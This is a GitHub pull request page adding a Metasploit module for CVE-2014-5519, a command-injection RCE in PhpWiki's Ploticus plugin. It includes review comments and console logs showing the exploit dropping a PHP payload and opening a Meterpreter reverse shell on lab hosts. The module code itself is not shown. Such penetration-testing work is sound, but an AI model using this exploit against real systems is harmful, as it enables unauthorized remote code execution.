Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Module for CVE-2014-5519, phpwiki/ploticus RCE #3799

Merged
merged 2 commits into from Sep 16, 2014
Merged

Module for CVE-2014-5519, phpwiki/ploticus RCE #3799

merged 2 commits into from Sep 16, 2014

Conversation

us3r777
Copy link
Contributor

@us3r777 us3r777 commented Sep 16, 2014

Description

The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection. Discovery and POC done by Benjamin Harris.

Links

http://www.exploit-db.com/exploits/34451/
http://www.cvedetails.com/cve/CVE-2014-5519/
http://seclists.org/fulldisclosure/2014/Aug/77

Reproduction steps

Tests

2014-09-16 14:19:04 +0200 S:0 J:0> use exploit/multi/http/phpwiki_ploticus_exec 
2014-09-16 14:19:12 +0200 S:0 J:0 exploit(phpwiki_ploticus_exec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
2014-09-16 14:19:18 +0200 S:0 J:0 exploit(phpwiki_ploticus_exec) > run

[*] Started reverse handler on 192.168.56.1:4444 
[*] 192.168.56.101:80 - Executing payload gpPdLWOs.php
[*] Sending stage (40551 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:55045) at 2014-09-16 14:19:23 +0200

meterpreter > getuid
Server username: www-data (33)

wchen-r7
wchen-r7 reviewed Sep 16, 2014
View reviewed changes
modules/exploits/multi/http/phpwiki_ploticus_exec.rb
[
[ 'CVE', '2014-5519' ],
[ 'OSVDB', '110576' ],
[ 'URL', 'http://www.exploit-db.com/exploits/34451/']
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For Exploit-DB, you can use EDB instead of URL.

See all the identifiers you can use:
https://github.com/rapid7/metasploit-framework/wiki/Metasploit-module-reference-identifiers

Some refactoring
7a7b6cb 
Use EDB instead of URL for Exploit-DB.
Remove peer variable as peer comes from HttpClient.
@wchen-r7
Copy link
Contributor

I am having trouble setting up this app. I keep getting this:

Call to undefined method WikiDB_backend_dba::WikiDB_backend_dbaBase() in /var/www/html/phpwiki-1.5.0/lib/WikiDB/backend/dba.php on line 35

I find no function WikiDB_backend_dbaBase. Looks like a broken build?

@wchen-r7
Copy link
Contributor

Never mind. I figured it out. It is indeed a broken build. Looks like it's meant to call the parent method.

@wchen-r7
Copy link
Contributor

Filed a ticket for the bug I hit:
https://sourceforge.net/p/phpwiki/bugs/647/

@wchen-r7
Copy link
Contributor

It looks like 1.5.0 is patched. I haven't really looked into the actual fix, but the exploit will trigger errors complaining about accessing protected methods... I am guessing that is the "patch".

@wchen-r7
Copy link
Contributor

The actual fix might be this:
https://sourceforge.net/p/phpwiki/code/8974/?page=1

@wchen-r7
Copy link
Contributor

Exploit verified:

msf exploit(phpwiki_ploticus_exec) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.114:80 - Executing payload fyjxncEV.php
[*] Sending stage (40551 bytes) to 192.168.1.114
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.114:40402) at 2014-09-16 12:42:55 -0500

meterpreter >

@wchen-r7 wchen-r7 self-assigned this Sep 16, 2014
@wchen-r7
Copy link
Contributor

Landing the PR in a bit. Made minor edits to msftidy and added two more references for bug tracking purposes.

@wchen-r7 wchen-r7 merged commit 7a7b6cb into rapid7:master Sep 16, 2014
wchen-r7 added a commit that referenced this pull request Sep 16, 2014
@wchen-r7
Land #3799 - Add CVE-2014-5519: phpwiki/ploticus RCE
ceaf1d6
@us3r777 us3r777 deleted the phpwiki_ploticus_exec branch December 8, 2014 17:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@us3r777 @wchen-r7